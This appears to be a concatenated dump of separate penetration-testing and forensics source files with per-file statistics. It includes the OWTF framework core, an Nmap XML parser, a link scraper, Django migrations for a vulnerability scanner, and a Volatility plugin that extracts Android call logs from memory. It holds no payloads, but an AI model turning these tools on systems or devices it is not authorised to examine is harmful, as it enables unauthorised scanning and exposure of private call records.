'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'addParameter': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'addParameter_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 64.008621 | 130 | 0.541512 |
owtf | """
owtf.core
~~~~~~~~~
This is the command-line front-end in charge of processing arguments and call the framework.
"""
from __future__ import print_function
from copy import deepcopy
import logging
import os
import signal
import sys
from tornado.ioloop import IOLoop, PeriodicCallback
from owtf import __version__
from owtf.api.main import start_server
from owtf.config import config_handler
from owtf.files.main import start_file_server
from owtf.lib import exceptions
from owtf.lib.cli_options import parse_options, usage
from owtf.managers.config import load_framework_config, load_general_config
from owtf.managers.plugin import (
get_types_for_plugin_group,
load_plugins,
load_test_groups,
)
from owtf.managers.resource import load_resources_from_file
from owtf.managers.session import _ensure_default_session
from owtf.managers.target import load_targets
from owtf.managers.worklist import load_works
from owtf.models.plugin import Plugin
from owtf.plugin.runner import show_plugin_list
from owtf.proxy.main import start_proxy
from owtf.settings import (
AUX_TEST_GROUPS,
DEFAULT_FRAMEWORK_CONFIG,
DEFAULT_GENERAL_PROFILE,
DEFAULT_RESOURCES_PROFILE,
FALLBACK_AUX_TEST_GROUPS,
FALLBACK_FRAMEWORK_CONFIG,
FALLBACK_GENERAL_PROFILE,
FALLBACK_NET_TEST_GROUPS,
FALLBACK_RESOURCES_PROFILE,
FALLBACK_WEB_TEST_GROUPS,
NET_TEST_GROUPS,
WEB_TEST_GROUPS,
)
from owtf.transactions.main import start_transaction_logger
from owtf.utils.file import clean_temp_storage_dirs, create_temp_storage_dirs
from owtf.utils.process import _signal_process
from owtf.utils.signals import workers_finish, owtf_start
__all__ = ["finish", "main"]
# Store parent PID for clean exit
owtf_pid = None
# Get a global DB connection instance
from owtf.db.session import get_scoped_session
db = get_scoped_session()
def print_banner():
    """
    Print the application banner.
    """
    # \033[92m / \033[0m wrap the banner in ANSI bright-green / reset.
    print(
        """\033[92m
 _____ _ _ _ _____ _____
|     | | | |_   _|   __|
|  |  | | | | | | |   __|
|_____|_____| |_| |__|
        @owtfp
    http://owtf.org
    Version: {0}
\033[0m""".format(
            __version__
        )
    )
def get_plugins_from_arg(arg):
    """ Returns a list of requested plugins and plugin groups

    :param arg: Comma separated list of plugins
    :type arg: `str`
    :return: List of plugins and plugin groups
    :rtype: `list`
    """
    plugins = arg.split(",")
    plugin_groups = Plugin.get_groups_for_plugins(db, plugins)
    if len(plugin_groups) > 1:
        # BUG FIX: the message used a %-style '%s' placeholder with
        # str.format(), so the group list was never interpolated into the
        # usage text; use a {0} replacement field instead.
        usage(
            "The plugins specified belong to several plugin groups: '{0}'".format(
                str(plugin_groups)
            )
        )
    return [plugins, plugin_groups]
def process_options(user_args):
    """ The main argument processing function

    :param user_args: User supplied arguments
    :type user_args: `dict`
    :return: A dictionary of arguments
    :rtype: `dict`
    """
    # NOTE(review): user_args is actually the sys.argv[1:] list handed in
    # by main(); the docstring's `dict` type looks stale.
    arg = None
    try:
        valid_groups = Plugin.get_all_plugin_groups(db)
        valid_types = Plugin.get_all_plugin_types(db) + ["all", "quiet"]
        arg = parse_options(user_args, valid_groups, valid_types)
    except KeyboardInterrupt as e:
        usage("Invalid OWTF option(s) {}".format(e))
        sys.exit(0)
    except SystemExit:
        # --help triggers the SystemExit exception, catch it and exit
        finish()
    if arg:
        # Default settings:
        plugin_group = arg.plugin_group
        if arg.only_plugins:
            arg.only_plugins, plugin_groups = get_plugins_from_arg(arg.only_plugins)
            try:
                # Set Plugin Group according to plugin list specified
                plugin_group = plugin_groups[0]
            except IndexError:
                usage("Please use either OWASP/OWTF codes or Plugin names")
            logging.info(
                "Defaulting plugin group to '%s' based on list of plugins supplied",
                plugin_group,
            )
        if arg.except_plugins:
            arg.except_plugins, plugin_groups = get_plugins_from_arg(arg.except_plugins)
        # --tor-mode takes a colon-separated spec; "help" prints setup
        # instructions, otherwise it is rewritten into an outbound proxy.
        if arg.tor_mode:
            arg.tor_mode = arg.tor_mode.split(":")
            if arg.tor_mode[0] == "help":
                from owtf.proxy.tor_manager import TOR_manager
                TOR_manager.msg_configure_tor()
                exit(0)
            if len(arg.tor_mode) == 1:
                if arg.tor_mode[0] != "help":
                    usage("Invalid argument for TOR-mode")
            elif len(arg.tor_mode) != 5:
                usage("Invalid argument for TOR-mode")
            else:
                # Enables outbound_proxy.
                if arg.tor_mode[0] == "":
                    outbound_proxy_ip = "127.0.0.1"
                else:
                    outbound_proxy_ip = arg.tor_mode[0]
                if arg.tor_mode[1] == "":
                    outbound_proxy_port = "9050"  # default TOR port
                else:
                    outbound_proxy_port = arg.tor_mode[1]
                arg.outbound_proxy = "socks://{0}:{1}".format(
                    outbound_proxy_ip, outbound_proxy_port
                )
        # Normalise the outbound proxy spec into [type, ip, port] parts.
        if arg.outbound_proxy:
            arg.outbound_proxy = arg.outbound_proxy.split("://")
            if len(arg.outbound_proxy) == 2:
                arg.outbound_proxy = arg.outbound_proxy + arg.outbound_proxy.pop().split(
                    ":"
                )
                if arg.outbound_proxy[0] not in ["socks", "http"]:
                    usage("Invalid argument for outbound proxy")
            else:
                arg.outbound_proxy = arg.outbound_proxy.pop().split(":")
            # outbound_proxy should be type://ip:port
            if len(arg.outbound_proxy) not in [2, 3]:
                usage("Invalid argument for outbound proxy")
            else:  # Check if the port is an int.
                try:
                    int(arg.outbound_proxy[-1])
                except ValueError:
                    usage("Invalid port provided for Outbound Proxy")
        if arg.inbound_proxy:
            arg.inbound_proxy = arg.inbound_proxy.split(":")
            # inbound_proxy should be (ip:)port:
            if len(arg.inbound_proxy) not in [1, 2]:
                usage("Invalid argument for Inbound Proxy")
            else:
                try:
                    int(arg.inbound_proxy[-1])
                except ValueError:
                    usage("Invalid port for Inbound Proxy")
        plugin_types_for_group = get_types_for_plugin_group(db, plugin_group)
        if arg.plugin_type == "all":
            arg.plugin_type = plugin_types_for_group
        elif arg.plugin_type == "quiet":
            arg.plugin_type = ["passive", "semi_passive"]
        scope = arg.targets or []  # Arguments at the end are the URL target(s)
        num_targets = len(scope)
        if plugin_group != "auxiliary" and num_targets == 0 and not arg.list_plugins:
            if arg.nowebui:
                finish()
        elif num_targets == 1:  # Check if this is a file
            if os.path.isfile(scope[0]):
                logging.info("Scope file: trying to load targets from it ..")
                new_scope = []
                for target in open(scope[0]).read().split("\n"):
                    clean_target = target.strip()
                    if not clean_target:
                        continue  # Skip blank lines
                    new_scope.append(clean_target)
                if len(new_scope) == 0:  # Bad file
                    usage("Please provide a scope file (1 target x line)")
                scope = new_scope
        # A leading dash in a target means an option was mis-parsed.
        for target in scope:
            if target[0] == "-":
                usage("Invalid Target: {}".format(target))
        args = ""
        if plugin_group == "auxiliary":
            # For auxiliary plugins, the scope are the parameters.
            args = scope
            # auxiliary plugins do not have targets, they have metasploit-like parameters.
            scope = ["auxiliary"]
        return {
            "list_plugins": arg.list_plugins,
            "force_overwrite": arg.force_overwrite,
            "interactive": arg.interactive == "yes",
            "scope": scope,
            "argv": sys.argv,
            "plugin_type": arg.plugin_type,
            "only_plugins": arg.only_plugins,
            "except_plugins": arg.except_plugins,
            "inbound_proxy": arg.inbound_proxy,
            "outbound_proxy": arg.outbound_proxy,
            "outbound_proxy_auth": arg.outbound_proxy_auth,
            "plugin_group": plugin_group,
            "rport": arg.rport,
            "port_waves": arg.port_waves,
            "proxy_mode": arg.proxy_mode,
            "tor_mode": arg.tor_mode,
            "nowebui": arg.nowebui,
            "args": args,
        }
    return {}
def initialise_framework(options):
    """This function initializes the entire framework

    :param options: Additional arguments for the component initializer
    :type options: `dict`
    :return: True if all commands do not fail
    :rtype: `bool`
    """
    logging.info("Loading framework please wait..")
    # No processing required, just list available modules.
    if options["list_plugins"]:
        show_plugin_list(db, options["list_plugins"])
        # finish() signals the parent process; the list-only path does
        # not fall through to a full startup.
        finish()
    target_urls = load_targets(session=db, options=options)
    load_works(session=db, target_urls=target_urls, options=options)
    # Background services: MiTM proxy and HTTP transaction logger.
    start_proxy()
    start_transaction_logger()
    return True
def poll_workers():
    """Run the Tornado IOLoop, ticking worker management every 2 seconds."""
    # Imported here to avoid triggering worker-manager setup at module load.
    from owtf.managers.worker import worker_manager
    callback = PeriodicCallback(worker_manager.manage_workers, 2000)
    try:
        callback.start()
        IOLoop.instance().start()
    except SystemExit as e:
        # Shutdown path: stop the periodic callback cleanly.
        callback.stop()
def init(args):
    """Start OWTF.

    :params dict args: Options from the CLI.
    """
    if not initialise_framework(args):
        return
    # Headless mode (--nowebui) skips the UI servers but still polls workers.
    if not args["nowebui"]:
        start_server()
        start_file_server()
    poll_workers()
@workers_finish.connect
def finish(sender=None, **kwargs):
    """Blinker handler: when all workers report done, send SIGINT to the
    parent OWTF process so the normal shutdown path runs."""
    if sender:
        logging.debug("[{}]: sent the signal".format(sender))
    global owtf_pid
    _signal_process(pid=owtf_pid, psignal=signal.SIGINT)
def main():
    """Load configuration, bootstrap the database, then run the framework.

    :return: None
    :rtype: None
    """
    args = sys.argv
    print_banner()
    # Get tool path from script path:
    root_dir = os.path.dirname(os.path.abspath(args[0])) or "."
    global owtf_pid
    owtf_pid = os.getpid()
    # Bootstrap the DB
    create_temp_storage_dirs(owtf_pid)
    try:
        _ensure_default_session(db)
        load_framework_config(
            DEFAULT_FRAMEWORK_CONFIG, FALLBACK_FRAMEWORK_CONFIG, root_dir, owtf_pid
        )
        load_general_config(db, DEFAULT_GENERAL_PROFILE, FALLBACK_GENERAL_PROFILE)
        load_resources_from_file(
            db, DEFAULT_RESOURCES_PROFILE, FALLBACK_RESOURCES_PROFILE
        )
        load_test_groups(db, WEB_TEST_GROUPS, FALLBACK_WEB_TEST_GROUPS, "web")
        load_test_groups(db, NET_TEST_GROUPS, FALLBACK_NET_TEST_GROUPS, "net")
        load_test_groups(db, AUX_TEST_GROUPS, FALLBACK_AUX_TEST_GROUPS, "aux")
        # After loading the test groups then load the plugins, because of many-to-one relationship
        load_plugins(db)
    except exceptions.DatabaseNotRunningException:
        sys.exit(-1)
    # Rebind: from here on, args is the processed option dictionary.
    args = process_options(args[1:])
    config_handler.cli_options = deepcopy(args)
    # Patch args by sending the OWTF start signal
    owtf_start.send(__name__, args=args)
    # Initialise Framework.
    try:
        if init(args):
            # Only if Start is for real (i.e. not just listing plugins, etc)
            finish()  # Not Interrupted or Crashed.
    except KeyboardInterrupt:
        # NOTE: The user chose to interact: interactivity check redundant here:
        logging.warning("OWTF was aborted by the user")
        logging.info("Please check report/plugin output files for partial results")
        # Interrupted. Must save the DB to disk, finish report, etc.
        finish()
    except SystemExit:
        pass  # Report already saved, framework tries to exit.
    finally:  # Needed to rename the temp storage dirs to avoid confusion.
        clean_temp_storage_dirs(owtf_pid)
| 33.255556 | 98 | 0.589166 |
cybersecurity-penetration-testing | #!/usr/bin/python3
import sys
import os
import glob
def main(argv):
    """List file names with the given extension present in both System32
    and SysWOW64.

    :param argv: sys.argv-style list; argv[1] is the extension to match.
    :return: False when no extension was supplied, otherwise None.
    """
    if len(argv) == 1:
        print('Usage: ./script <ext>')
        return False
    ext = argv[1]
    windir = os.environ['Windir']
    p1 = os.path.join(windir, 'System32' + os.sep + '*.' + ext)
    p2 = os.path.join(windir, 'SysWOW64' + os.sep + '*.' + ext)
    sys.stderr.write('[.] System32: ' + p1 + '\n')
    sys.stderr.write('[.] SysWOW64: ' + p2 + '\n')
    # Collect base names from each directory, then intersect the sets.
    system32 = {os.path.basename(path) for path in glob.glob(p1)}
    syswow64 = {os.path.basename(path) for path in glob.glob(p2)}
    commons = system32 & syswow64
    sys.stderr.write(f"[.] Found {len(system32)} files in System32\n")
    sys.stderr.write(f"[.] Found {len(syswow64)} files in SysWOW64\n")
    sys.stderr.write(f"[.] Intersection of these two sets: {len(commons)}\n")
    for name in commons:
        print(name)
if __name__ == '__main__':
main(sys.argv) | 26.25 | 77 | 0.585714 |
PenTestScripts | #!/usr/bin/env python
import httplib2
from BeautifulSoup import BeautifulSoup, SoupStrainer
# Fetch the page and print the href of every anchor tag (Python 2 script).
http = httplib2.Http()
status, response = http.request('http://www.christophertruncer.com')
# SoupStrainer('a') restricts parsing to anchor tags only.
for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')):
    if link.has_key('href'):
        print link['href']
| 25.25 | 70 | 0.738854 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Purpose: An script that can process and parse NMAP XMLs
Returnable Data: A dictionary of hosts{iterated number} = [[hostnames], address, protocol, port, service name]
Name: nmap_parser.py
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import xml.etree.ElementTree as etree
import argparse
import collections
try:
import nmap_doc_generator as gen
except Exception as e:
print(e)
sys.exit("[!] Please download the nmap_doc_generator.py script")
class Nmap_parser:
    """Parse an Nmap XML report into a dictionary of host/port records.

    Python 2 only: uses the `except Exception, e` syntax and
    dict.iteritems().  Results live in self.hosts as
    {index: [hostname, address, protocol, port, service, hwaddress, state]}.
    """
    def __init__(self, nmap_xml, verbose=0):
        # Path to the Nmap XML file to parse.
        self.nmap_xml = nmap_xml
        # Verbosity level (0 = quiet); higher values print more detail.
        self.verbose = verbose
        # Populated by run(): index -> host/port record list.
        self.hosts = {}
        try:
            self.run()
        except Exception, e:
            print("[!] There was an error %s") % (str(e))
            sys.exit(1)
    def run(self):
        # Parse the nmap xml file and extract hosts and place them in a dictionary
        # Input: Nmap XML file and verbose flag
        # Return: Dictionary of hosts [iterated number] = [hostname, address, protocol, port, service name, state]
        if not self.nmap_xml:
            sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
        try:
            tree = etree.parse(self.nmap_xml)
        except:
            sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
        hosts={}
        services=[]
        hostname_list=[]
        root = tree.getroot()
        hostname_node = None
        if self.verbose > 0:
            print ("[*] Parsing the Nmap XML file: %s") % (self.nmap_xml)
        # Pass 1: walk every <host>, collecting addresses and open ports.
        for host in root.iter('host'):
            hostname = "Unknown hostname"
            for addresses in host.iter('address'):
                # Defaults used when an address type is absent for a host.
                hwaddress = "No MAC Address ID'd"
                ipv4 = "No IPv4 Address ID'd"
                addressv6 = "No IPv6 Address ID'd"
                temp = addresses.get('addrtype')
                if "mac" in temp:
                    hwaddress = addresses.get('addr')
                    if self.verbose > 2:
                        print("[*] The host was on the same broadcast domain")
                if "ipv4" in temp:
                    address = addresses.get('addr')
                    if self.verbose > 2:
                        print("[*] The host had an IPv4 address")
                if "ipv6" in temp:
                    addressv6 = addresses.get('addr')
                    if self.verbose > 2:
                        print("[*] The host had an IPv6 address")
            try:
                hostname_node = host.find('hostnames').find('hostname')
            except:
                if self.verbose > 1:
                    print ("[!] No hostname found")
            if hostname_node is not None:
                hostname = hostname_node.get('name')
            else:
                hostname = "Unknown hostname"
                if self.verbose > 1:
                    print("[*] The hosts hostname is %s") % (str(hostname_node))
            hostname_list.append(hostname)
            for item in host.iter('port'):
                state = item.find('state').get('state')
                #if state.lower() == 'open':
                service = item.find('service').get('name')
                protocol = item.get('protocol')
                port = item.get('portid')
                services.append([hostname_list, address, protocol, port, service, hwaddress, state])
            # Reset the hostname accumulator for the next host element.
            hostname_list=[]
        # Pass 2: flatten the collected service rows into self.hosts.
        for i in range(0, len(services)):
            service = services[i]
            index = len(service) - 1
            hostname = str1 = ''.join(service[0])
            address = service[1]
            protocol = service[2]
            port = service[3]
            serv_name = service[4]
            hwaddress = service[5]
            state = service[6]
            self.hosts[i] = [hostname, address, protocol, port, serv_name, hwaddress, state]
            if self.verbose > 2:
                print ("[+] Adding %s with an IP of %s:%s with the service %s")%(hostname,address,port,serv_name)
        if self.hosts:
            if self.verbose > 4:
                print ("[*] Results from NMAP XML import: ")
                for key, entry in self.hosts.iteritems():
                    print("[*] %s") % (str(entry))
            if self.verbose > 0:
                print ("[+] Parsed and imported unique ports %s") % (str(i+1))
        else:
            if self.verbose > 0:
                print ("[-] No ports were discovered in the NMAP XML file")
    def hosts_return(self):
        # A controlled return method
        # Input: None
        # Returned: The processed hosts
        try:
            return self.hosts
        except Exception as e:
            print("[!] There was an error returning the data %s") % (e)
if __name__ == '__main__':
    # CLI entry point: parse one or more NMAP XML reports, merge and
    # de-duplicate the results, then emit an XLSX via gen.Nmap_doc_generator.
    usage = '''usage: %(prog)s [-x reports.xml] [-f xml_output2.xlsx] -s -q -v -vv -vvv'''
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument("-x", "--xml", type=str, help="Generate a dictionary of data based on a NMAP XML import, more than one file may be passed, separated by a comma", action="store", dest="xml")
    parser.add_argument("-f", "--filename", type=str, action="store", dest="filename", default="xml_output", help="The filename that will be used to create an XLSX")
    parser.add_argument("-s", "--simple", action="store_true", dest="simple", help="Format the output into a simple excel product, instead of a report")
    parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
    parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
    parser.add_argument('--version', action='version', version='%(prog)s 0.43b')
    args = parser.parse_args()
    # Argument Validator
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    # Set Constructors
    xml = args.xml               # nmap XML report(s), comma separated
    if not xml:
        sys.exit("[!] No XML file provided")
    verbose = args.verbose       # Verbosity level
    filename = args.filename     # Filename to output XLSX
    simple = args.simple         # Sets the colors for the excel spreadsheet output
    hosts = []                   # One parser instance per input file
    hosts_dict = {}              # Combined results from all parsed files
    processed_hosts = {}         # Unique values from all processed XMLs
    count = 0                    # Running key while combining dictionaries
    if "," in xml:
        xml_list = xml.split(',')
    else:
        xml_list = [xml]
    for x in xml_list:
        try:
            tree_temp = etree.parse(x)
        except Exception:
            sys.exit("[!] Cannot open XML file: %s \n[-] Ensure that your are passing the correct file and format" % (x))
        try:
            root = tree_temp.getroot()
            name = root.get("scanner")
            if name is not None and "nmap" in name:
                if verbose > 1:
                    print("[*] File being processed is an NMAP XML")
                hosts.append(Nmap_parser(x, verbose))
            else:
                # Fix: original used "% " (an invalid conversion for a string
                # argument) instead of "%s", which raised at runtime.
                print("[!] File %s is not an NMAP XML" % (str(x)))
                sys.exit(1)
        except Exception as e:
            print("[!] Processing of file %s failed %s" % (str(x), str(e)))
            sys.exit(1)
    # Processing of each instance returned to create a composite dictionary
    if not hosts:
        sys.exit("[!] There was an issue processing the data")
    for inst in hosts:
        hosts_temp = inst.hosts_return()
        if hosts_temp is not None:
            for k, v in hosts_temp.items():
                hosts_dict[count] = v
                count += 1
            hosts_temp.clear()
    if verbose > 3:
        for key, value in hosts_dict.items():
            print("[*] Key: %s Value: %s" % (key, value))
    # Sort by original key, then keep only the first occurrence of each value
    # (string comparison against already-accepted entries).
    temp = [(k, hosts_dict[k]) for k in hosts_dict]
    temp.sort()
    key = 0
    for k, v in temp:
        if str(v) in str(processed_hosts.values()):
            continue
        key += 1
        processed_hosts[key] = v
    # Generator for XLSX documents
    gen.Nmap_doc_generator(verbose, processed_hosts, filename, simple)
| 44.607759 | 197 | 0.583743 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 22:29
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds an `email_text` column to the
    # `nmapscan` model, on top of nmaper/0001_initial.
    dependencies = [
        ('nmaper', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='nmapscan',
            name='email_text',
            # Existing rows are backfilled with this one-off default;
            # preserve_default=False keeps the default out of the model state.
            field=models.CharField(default='websecweb@gmail.com', max_length=64),
            preserve_default=False,
        ),
    ]
| 22.181818 | 81 | 0.59725 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
###################################################################################################
class dalvik_app_calllog(linux_common.AbstractLinuxCommand):
    """Volatility plugin: recover Android call-log records (PhoneCallDetails
    instances) from a process heap in a Linux/Android memory image.

    PID, gDvm offset and the PhoneCallDetails class offset may be supplied on
    the command line; otherwise the plugin tries to auto-detect them via the
    companion dalvik plugins.
    """
###################################################################################################
    def __init__(self, config, *args, **kwargs):
        # Register the shared dalvik CLI options (PID, gDvm offset) plus the
        # offset of the PhoneCallDetails system class.
        linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
        dalvik.register_option_PID(self._config)
        dalvik.register_option_GDVM_OFFSET(self._config)
        self._config.add_option('CLASS_OFFSET', short_option = 'c', default = None,
        help = 'This is the offset (in hex) of system class PhoneCallDetails.java', action = 'store', type = 'str')
###################################################################################################
    def calculate(self):
        """Yield candidate PhoneCallDetails objects found in the target heap."""
        # if no gDvm object offset was specified, use this one
        # NOTE(review): 0x41b0 looks image-specific — confirm for other dumps.
        if not self._config.GDVM_OFFSET:
            self._config.GDVM_OFFSET = str(hex(0x41b0))
        # use linux_pslist plugin to find process address space and ID if not specified
        proc_as = None
        tasks = linux_pslist.linux_pslist(self._config).calculate()
        for task in tasks:
            # "ndroid.contacts" — presumably "com.android.contacts" truncated
            # to the kernel's comm field width; verify against the image.
            if str(task.comm) == "ndroid.contacts":
                proc_as = task.get_process_address_space()
                if not self._config.PID:
                    self._config.PID = str(task.pid)
                break
        # use dalvik_loaded_classes plugin to find class offset if not specified
        if not self._config.CLASS_OFFSET:
            classes = dalvik_loaded_classes.dalvik_loaded_classes(self._config).calculate()
            for task, clazz in classes:
                # +"" forces the wrapped value into a plain string for comparison
                if (dalvik.getString(clazz.sourceFile)+"" == "PhoneCallDetails.java"):
                    self._config.CLASS_OFFSET = str(hex(clazz.obj_offset))
                    break
        # use dalvik_find_class_instance plugin to find a list of possible class instances
        instances = dalvik_find_class_instance.dalvik_find_class_instance(self._config).calculate()
        for sysClass, inst in instances:
            callDetailsObj = obj.Object('PhoneCallDetails', offset = inst, vm = proc_as)
            # access type ID field for sanity check
            typeID = int(callDetailsObj.callTypes.contents0)
            # valid type ID must be 1,2 or 3
            if (typeID == 1 or typeID == 2 or typeID == 3):
                yield callDetailsObj
###################################################################################################
    def render_text(self, outfd, data):
        """Render one table row per recovered call record."""
        self.table_header(outfd, [ ("InstanceClass", "13"),
                                   ("Date", "19"),
                                   ("Contact", "20"),
                                   ("Number", "15"),
                                   ("Duration", "13"),
                                   ("Iso", "3"),
                                   ("Geocode", "15"),
                                   ("Type", "8")
                                   ])
        for callDetailsObj in data:
            # convert epoch time to human readable date and time
            # (timestamp is in milliseconds; Python 2 integer division assumed)
            rawDate = callDetailsObj.date / 1000
            date = str(time.gmtime(rawDate).tm_mday) + "." + \
                   str(time.gmtime(rawDate).tm_mon) + "." + \
                   str(time.gmtime(rawDate).tm_year) + " " + \
                   str(time.gmtime(rawDate).tm_hour) + ":" + \
                   str(time.gmtime(rawDate).tm_min) + ":" + \
                   str(time.gmtime(rawDate).tm_sec)
            # convert duration from seconds to hh:mm:ss format
            duration = str(callDetailsObj.duration / 3600) + "h " + \
                       str((callDetailsObj.duration % 3600) / 60) + "min " + \
                       str(callDetailsObj.duration % 60) + "s"
            # replace call type ID by string
            callType = int(callDetailsObj.callTypes.contents0)
            if callType == 1:
                callType = "incoming"
            elif callType == 2:
                callType = "outgoing"
            elif callType == 3:
                callType = "missed"
            else:
                callType = "unknown"
            self.table_row( outfd,
                            hex(callDetailsObj.obj_offset),
                            date,
                            dalvik.parseJavaLangString(callDetailsObj.name.dereference_as('StringObject')),
                            dalvik.parseJavaLangString(callDetailsObj.formattedNumber.dereference_as('StringObject')),
                            duration,
                            dalvik.parseJavaLangString(callDetailsObj.countryIso.dereference_as('StringObject')),
                            dalvik.parseJavaLangString(callDetailsObj.geoCode.dereference_as('StringObject')),
                            callType)
| 51.941667 | 125 | 0.508974 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"


def run(PluginInfo):
    """OWTF plugin entry point: renders a placeholder HTML string.

    Fix: the parameter was misspelled ``PluginInfoz``; renamed to
    ``PluginInfo`` to match every other plugin's signature (the argument is
    unused here; assumed to be passed positionally by the framework —
    verify against the plugin runner).
    """
    Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
    return Content
| 23.888889 | 85 | 0.766816 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
